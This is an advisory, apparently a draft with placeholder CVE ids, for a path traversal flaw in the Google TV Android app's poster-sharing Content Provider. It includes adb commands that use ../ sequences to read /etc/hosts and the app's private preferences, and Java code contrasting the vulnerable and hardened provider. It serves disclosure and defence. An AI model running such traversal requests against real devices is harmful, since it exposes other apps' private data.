CVE-2024-yaytempyay Details
Product | Google TV version 4.39.2590.678247678.4-release |
Severity | ??? |
CVE Reference | CVE-2025-yaytempyay |
Type | Path Traversal |
Description
The Google TV Android application (com.google.android.videos) had an exported Content Provider containing a Path Traversal vulnerability. Specifically, the vulnerable Content Provider is com.google.android.apps.googletv.app.image.PosterSharingContentProvider.
This issue was exploitable under the following conditions:
- The underlying Google Account was part of a Google Family
- The Google Family had previously purchased products in the Family Library
- The application had previously been opened and the Highlights section viewed
Impact
This allows any application installed on the device (or the adb shell user) to read files that the Google TV Android application itself can read, including files in its private data directory, since the provider opens them under Google TV's own UID.
Proof of Concept (PoC)
The following transcript shows that the adb shell user on a Samsung Galaxy S24 could abuse the vulnerable Content Provider to read the /etc/hosts file:
e1s:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid),3012(readtracefs) context=u:r:shell:s0
e1s:/ $ content read --uri content://com.google.android.videos.postersharingcontentprovider/../../../../../../etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
Additionally, the same issue could be used to read files in Google TV's private data directory, which the shell user cannot read directly:
e1s:/ $ cat /data/data/com.google.android.videos/shared_prefs/registration_data.xml
cat: /data/data/com.google.android.videos/shared_prefs/registration_data.xml: Permission denied
e1s:/ $ content read --uri content://com.google.android.videos.postersharingcontentprovider/../../shared_prefs/registration_data.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="last_successful_registration_environment_url">notifications-pa.googleapis.com</string>
<boolean name="is_registered_to_unified_fcm_registration" value="false" />
<int name="last_successful_registration_request_hash_code" value="364779808" />
<long name="last_successful_registration_time_ms" value="1728826771075" />
<string name="fetch_only_id">c21e1400-64e6-4663-a32c-5682569d2bc1</string>
<string name="internal_target_id">Ch1nY21fZm86djE6Njc3MDQ3MDA2Mzg2MzMxNTk2Nw</string>
<int name="last_successful_registration_account_type" value="1" />
</map>
Technical Details
The vulnerable Content Provider is meant to serve files stored under /data/user/0/com.google.android.videos/files/offline_images/. However, this directory is not created by default, and the traversal only works once it exists.
One method to create this directory is to go to the Highlights section of the application, assuming that the underlying Google account met the following conditions:
- The Google Account was a part of a Google Family
- The Google Family had previously purchased TV shows or movies
Once those conditions are met, any application could have exploited this issue by adding ../ sequences to the Content Provider URI path, as in the PoC above.
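The following is an added example, not Google's code and not the vendor's fix: a minimal ContentProvider that serves files from the app's files/offline_images/ directory, written first in the traversal-prone shape the advisory describes (the URI path is appended to the base directory unchanged) and then with a canonical-path containment check. The class name PosterProvider, the method names and the package are assumptions for illustration. One detail worth noting: the kernel resolves every path component in order, so a request whose path passes through a nonexistent offline_images/ directory fails with ENOENT before the ../ components are ever applied, which is consistent with the advisory's precondition that the directory must exist.

```java
// Added example (not Google's code): a ContentProvider serving files from
// <app files dir>/offline_images/, in vulnerable and hardened form.
// Class, package and method names are assumptions for illustration.
package com.example.posterprovider;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

public class PosterProvider extends ContentProvider {

    private static final String IMAGE_DIR = "offline_images";

    private File baseDir() {
        // getFilesDir() is /data/user/0/<package>/files, so this is the
        // directory the advisory names: .../files/offline_images/
        return new File(getContext().getFilesDir(), IMAGE_DIR);
    }

    // Vulnerable shape: the URI path is appended to the base directory as-is.
    // Uri.getPath() does not collapse "..", and neither does File, so
    // content://<authority>/../../shared_prefs/x.xml opens
    // <files>/offline_images/../../shared_prefs/x.xml, a file outside
    // offline_images that only this app's UID can normally read.
    // If offline_images/ does not exist the open fails with ENOENT before
    // the ".." components are resolved, hence the advisory's precondition.
    ParcelFileDescriptor openFileVulnerable(Uri uri) throws FileNotFoundException {
        File target = new File(baseDir(), uri.getPath());
        return ParcelFileDescriptor.open(target, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Containment check: getCanonicalPath() collapses "." and ".." and follows
    // symlinks on both sides, so the comparison is on the real file system
    // location. The trailing separator on the base keeps a sibling such as
    // ".../offline_images_evil/" from passing a plain prefix test.
    static boolean isInside(File base, File target) throws IOException {
        String canonicalBase = base.getCanonicalPath() + File.separator;
        String canonicalTarget = target.getCanonicalPath();
        return canonicalTarget.startsWith(canonicalBase);
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) {
            throw new FileNotFoundException("provider is read-only");
        }
        File base = baseDir();
        // For a flat directory, uri.getLastPathSegment() alone would also
        // remove the traversal; the canonical check additionally permits
        // legitimate subdirectories while still rejecting escapes.
        File target = new File(base, uri.getPath());
        try {
            if (!isInside(base, target)) {
                throw new FileNotFoundException("path escapes " + IMAGE_DIR);
            }
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve " + uri);
        }
        return ParcelFileDescriptor.open(target, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // The remaining ContentProvider methods play no part in file serving.
    @Override public boolean onCreate() { return true; }
    @Override public Cursor query(Uri uri, String[] projection, String selection,
                                  String[] selectionArgs, String sortOrder) { return null; }
    @Override public String getType(Uri uri) { return "image/*"; }
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    @Override public int update(Uri uri, ContentValues values, String selection,
                                String[] selectionArgs) { return 0; }
}
```

With the hardened openFile in place, the two PoC requests above (content://.../../../../../../../etc/hosts and content://.../../../shared_prefs/registration_data.xml) both canonicalize to paths outside offline_images/ and are refused with FileNotFoundException, while a request for a file that really lives under offline_images/ is still served. Whether the provider needs to be exported at all, and to whom, is a separate question the containment check does not answer.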